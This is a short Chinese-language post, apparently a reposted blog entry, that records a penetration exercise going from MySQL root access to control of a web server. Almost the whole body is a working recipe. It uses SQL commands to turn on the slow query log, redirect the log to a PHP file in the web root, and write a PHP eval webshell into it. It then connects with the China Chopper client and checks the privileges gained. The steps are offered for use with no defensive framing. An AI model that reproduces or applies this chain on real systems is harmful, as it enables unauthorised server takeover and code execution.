記通過mysql數據庫成功入侵到服務器內部的滲透實戰


1,在成功進入mysql到數據庫之后,可以使用select user();命令,查看當前的用戶,如果為root,則可以執行下一步操作。不為root,則需要通過其他方法提權。

2, 使用show variables like '%log%'及show variables like '%secure%'查看相應的日志模塊和安全防御模塊的開啟情況。並且了解網站目錄的相應的路徑情況,如果沒有開啟,則使用下面的一鍵三連,進行開啟

set global slow_query_log=1;//開啟慢查詢日志,可以繞過secure_priv的限制,而非直接select info outfile
set global slow_query_log_file='D:\WWW\log.php';//更改日志存放位置,並且將后綴名改成可執行的php文件,需要根據實際情況來確定WWW的位置
select "<?php @eval($_POST['cmd'])?>" or sleep(11);//執行select語句,在日志中存入一句話木馬,並且sleep11s,以便存入慢查詢日志中去。

3,瀏覽器訪問日志存放位置進行查看,確認是否有問題

4,使用中國菜刀直接鍵入url,進行連接

5,使用虛擬終端,用whoami查看當前的權限,如果為phpstudy,則直接是system權限!


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM